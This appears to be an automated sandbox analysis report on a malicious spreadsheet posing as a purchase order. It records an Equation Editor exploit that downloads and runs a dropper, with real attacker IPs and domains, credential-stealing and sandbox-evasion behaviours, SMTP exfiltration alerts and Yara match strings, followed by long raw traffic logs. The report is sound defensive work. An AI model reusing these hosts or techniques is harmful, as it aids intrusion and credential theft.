Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE ORDER & SAMPLE IMAGE.xlsx

Overview

General Information

Sample Name:PURCHASE ORDER & SAMPLE IMAGE.xlsx
Analysis ID:786424
MD5:27f586f26da21955c782e9268ad1c4ce
SHA1:b9be1204d078c487f6ade5e2a6cd2164c46a7996
SHA256:2d46eee159ec36ab5e9f8bc29a7e0464c9b1be8c3454cdb8c9880640dcfda02f
Tags:xlsx
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
May check the online IP address of the machine
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Office equation editor establishes network connection
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 868 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 1924 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 1CEC9C1FA633D554029A6402174612D1)
      • lyebkz.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx MD5: 41467466B6E727C3C65D9501F6A23A04)
        • lyebkz.exe (PID: 1468 cmdline: C:\Users\user\AppData\Local\Temp\lyebkz.exe MD5: 41467466B6E727C3C65D9501F6A23A04)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x231:$s3: autoLoad="true"

Sigma Signatures

Exploits

barindex
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 144.76.136.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 868, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Sigma detected: File Dropped By EQNEDT32EXE
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 868, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exe

Snort Signatures

Timestamp:192.168.2.225.249.163.12491795872030171 01/18/23-09:14:44.835847
SID:2030171
Source Port:49179
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491765872851779 01/18/23-09:14:10.473531
SID:2851779
Source Port:49176
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491775872851779 01/18/23-09:14:10.519471
SID:2851779
Source Port:49177
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491765872030171 01/18/23-09:14:10.473417
SID:2030171
Source Port:49176
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491785872840032 01/18/23-09:14:44.736459
SID:2840032
Source Port:49178
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491795872851779 01/18/23-09:14:44.836010
SID:2851779
Source Port:49179
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491795872840032 01/18/23-09:14:44.836010
SID:2840032
Source Port:49179
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491785872030171 01/18/23-09:14:44.736395
SID:2030171
Source Port:49178
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491765872840032 01/18/23-09:14:10.473531
SID:2840032
Source Port:49176
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491775872840032 01/18/23-09:14:10.519471
SID:2840032
Source Port:49177
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491775872030171 01/18/23-09:14:10.519401
SID:2030171
Source Port:49177
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.225.249.163.12491785872851779 01/18/23-09:14:44.736459
SID:2851779
Source Port:49178
Destination Port:587
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxReversingLabs: Detection: 56%
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxVirustotal: Detection: 59%Perma Link
Antivirus / Scanner detection for submitted sample
Source: PURCHASE ORDER & SAMPLE IMAGE.xlsxAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\maxdyn2.1[1].exeReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\word.exeReversingLabs: Detection: 35%

Exploits

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 144.76.136.153 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 144.76.136.153 Port: 443Jump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: Binary string: wntdll.pdb source: lyebkz.exe, 00000006.00000003.978471354.000000001A930000.00000004.00001000.00020000.00000000.sdmp, lyebkz.exe, 00000006.00000003.979961442.000000001AA90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405D74
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040699E FindFirstFileW,FindClose,5_2_0040699E
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040290B FindFirstFileW,5_2_0040290B

Software Vulnerabilities

barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674CE0 URLDownloadToFileW,2_2_03674CE0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674C4F LoadLibraryW,URLDownloadToFileW,2_2_03674C4F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674D4B ExitProcess,2_2_03674D4B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674D2B WinExec,ExitProcess,2_2_03674D2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03674C77 URLDownloadToFileW,2_2_03674C77
Source: global trafficDNS query: name: transfer.sh
Source: global trafficDNS query: name: api.ipify.org
Source: global trafficDNS query: name: api.ipify.org
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficDNS query: name: box.aosxer.com
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 144.76.136.153:80 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 144.76.136.153:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
